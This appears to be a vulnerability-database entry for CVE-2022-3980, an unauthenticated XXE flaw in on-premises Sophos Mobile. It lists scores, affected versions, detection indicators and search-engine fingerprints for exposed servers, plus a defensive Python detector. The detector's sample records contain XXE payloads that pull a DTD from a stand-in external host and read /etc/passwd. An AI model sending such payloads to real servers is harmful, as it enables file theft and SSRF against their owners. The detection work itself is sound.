CVE-2022-3980
Published: 2022-11-16
Priority: P183 · Critical · 9.8 (CVSS 3.1)
CVSS vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Badges: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 8.09% (94.1st percentile)
An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sophos | mobile | >= 5.0.0 < 9.7.5 | 9.7.5 |
| sophos | sophos_mobile_managed_on-premises | >= 5.0.0 < unspecified | unspecified |
| sophos | sophos_mobile_managed_on-premises | unspecified – 9.7.4 | — |
Detection & IOCs (extracted from sources)
- The exploit targets the OMA-DS servlet endpoint via HTTP POST with an XML body containing an XXE declaration. Monitor for POST requests to /servlets/OmaDsServlet with Content-Type application/xml whose body contains a DOCTYPE or ENTITY declaration. A DOCTYPE alone can be benign; an ENTITY declaration carrying a SYSTEM identifier (an external entity) is the higher-fidelity match.
- The nuclei template treats an HTTP 400 response with a zero-length body (len(body) == 0) as the expected reply to the exploit request. On its own this is a weak signal; use a 400 with an empty body on this endpoint to raise the confidence of an alert on the request pattern above, not as a standalone post-exploitation indicator.
- Identify exposed Sophos Mobile on-premises instances via Shodan (favicon hash -1274798165 or title 'sophos mobile') and FOFA (icon_hash=-1274798165 or title='Sophos Mobile').
- Out-of-band (OOB) detection: monitor for unexpected outbound HTTP or DNS callbacks originating from the Sophos Mobile server; a callback to the host named in the injected entity's SYSTEM URI confirms successful XXE/SSRF exploitation.
- The vulnerability affects only Sophos Mobile managed on-premises versions 5.0.0 through 9.7.4; cloud-hosted deployments are not affected.
- The exploit requires no authentication (CVSS PR:N, UI:N): the /servlets/OmaDsServlet endpoint is reachable without credentials, so restrict it at the network perimeter if upgrading to 9.7.5 is not immediately possible.
- The nuclei template uses a 50-second timeout for the exploit request, which suggests the XXE/SSRF callback may be slow or delayed; detection rules should allow for delayed OOB responses.
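The detection logic described in the bullets above, applied to constructed sample records, as an added example (this is not code from the page, from Sophos, or from the nuclei project). It flags POSTs to /servlets/OmaDsServlet whose XML body carries a DOCTYPE or ENTITY declaration, extracts the callback host from any SYSTEM URI, raises confidence when the reply is the HTTP 400 / empty body the nuclei template expects, and confirms an alert when that host appears in the server's outbound DNS/HTTP log. The JSON-lines request format and the egress-log format are assumptions made for this example, not a real product log format.

```python
"""Apply the CVE-2022-3980 indicators to constructed sample records.

Added example, not code from the page, from Sophos, or from the nuclei
project. The JSON-lines request format (src, method, path, content_type,
body, status, resp_len) and the egress-log format are assumptions.
"""
import json
import re
from urllib.parse import urlparse

TARGET_PATH = "/servlets/OmaDsServlet"
# Any DOCTYPE or ENTITY declaration in the body is the primary indicator.
DTD_RE = re.compile(r"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)
# A SYSTEM identifier names the URI an external entity would be fetched from.
SYSTEM_URI_RE = re.compile(r"""SYSTEM\s+["']([^"']+)["']""", re.IGNORECASE)


def callback_hosts(body):
    """Hostnames named by external entities: the expected OOB callback targets."""
    hosts = set()
    for uri in SYSTEM_URI_RE.findall(body):
        host = urlparse(uri).hostname  # None for file:// URIs
        if host:
            hosts.add(host.lower())
    return hosts


def classify(rec):
    """Return None for benign traffic, otherwise an alert dict for the record."""
    if rec.get("method", "").upper() != "POST":
        return None
    # Tolerant path match: ignore any query string and letter case.
    if urlparse(rec.get("path", "")).path.lower() != TARGET_PATH.lower():
        return None
    if "xml" not in rec.get("content_type", "").lower():
        return None
    body = rec.get("body", "")
    if not DTD_RE.search(body):
        return None
    uris = SYSTEM_URI_RE.findall(body)
    # The nuclei template expects HTTP 400 with a zero-length body; on its own
    # that is a weak signal, so it only raises confidence.
    template_like = rec.get("status") == 400 and rec.get("resp_len", -1) == 0
    if not uris:
        confidence = "low"      # DTD present but no external entity
    elif template_like:
        confidence = "high"
    else:
        confidence = "medium"
    return {"src": rec.get("src"), "hosts": sorted(callback_hosts(body)),
            "template_like_response": template_like, "confidence": confidence}


def correlate_oob(alerts, outbound):
    """Confirm alerts whose callback host appears in the server's egress log."""
    seen = {c["dst"].lower() for c in outbound}
    confirmed = []
    for alert in alerts:
        hits = [h for h in alert["hosts"] if h in seen]
        if hits:
            confirmed.append({**alert, "confirmed_by": hits})
    return confirmed


def scan(log_lines, outbound):
    """Run classify() over JSON-lines records and correlate with egress events."""
    alerts = []
    for line in log_lines:
        if line.strip():
            alert = classify(json.loads(line))
            if alert:
                alerts.append(alert)
    return alerts, correlate_oob(alerts, outbound)


# Constructed sample requests (not real traffic); RFC 5737 addresses.
SAMPLE_LOG = [
    json.dumps({"src": "203.0.113.7", "method": "POST", "path": "/servlets/OmaDsServlet",
                "content_type": "application/xml", "status": 400, "resp_len": 0,
                "body": '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM '
                        '"http://oob.example.net/xxe.dtd"> %xxe;]><foo>&zzz;</foo>'}),
    json.dumps({"src": "198.51.100.9", "method": "POST", "path": "/servlets/OmaDsServlet",
                "content_type": "text/xml", "status": 200, "resp_len": 512,
                "body": '<?xml version="1.0"?><SyncML><SyncHdr/></SyncML>'}),
    json.dumps({"src": "198.51.100.10", "method": "GET", "path": "/servlets/OmaDsServlet",
                "content_type": "", "status": 405, "resp_len": 0, "body": ""}),
    json.dumps({"src": "192.0.2.4", "method": "POST", "path": "/servlets/OmaDsServlet",
                "content_type": "application/xml", "status": 500, "resp_len": 120,
                "body": '<!DOCTYPE x [<!ENTITY e SYSTEM "file:///etc/passwd">]><x>&e;</x>'}),
]
# Constructed egress log from the Sophos Mobile host (DNS lookups, HTTP connections).
SAMPLE_OUTBOUND = [
    {"proto": "dns", "dst": "oob.example.net"},
    {"proto": "http", "dst": "mdm-updates.example.com"},
]

if __name__ == "__main__":
    found, confirmed = scan(SAMPLE_LOG, SAMPLE_OUTBOUND)
    for alert in found:
        print("alert", alert)
    for alert in confirmed:
        print("confirmed by OOB callback", alert)
```

The file:// record shows why the confidence tiers matter: a local-file entity produces no callback host, so it can never be confirmed by egress correlation and stays at medium on the request pattern alone.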
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| VulnCheck | — | 9.8 | CRITICAL | — |
GHSA
GHSA-965x-72v5-49v5 · ghsa_unreviewed · 2022-11-16 · CWE-611 · CRITICAL
An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.
VulnCheck
Sophos Mobile: Improper Restriction of XML External Entity Reference · 2022 · CVSS 9.8 · CRITICAL
An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.
Affected: Sophos Mobile
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References (Shadowserver honeypot statistics):
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-13&host_type=src&vulnerability=cve-2022-3980
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-25&host_type=src&vulnerability=cve-2022-3980
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?
No detection rules found.
Nuclei
Sophos Mobile managed on-premises - XML External Entity Injection · nuclei · CVSS 9.8 · CRITICAL
An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.
Template:
```yaml
id: CVE-2022-3980

info:
  name: Sophos Mobile managed on-premises - XML External Entity Injection
  author: dabla
  severity: critical
  description: |
    An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server or conduct server-side request forgery (SSRF) attacks.
  remediation: |
    Apply the latest s
```
No writeups or analysis indexed.
2022-11-16: Published
Exploited in the wild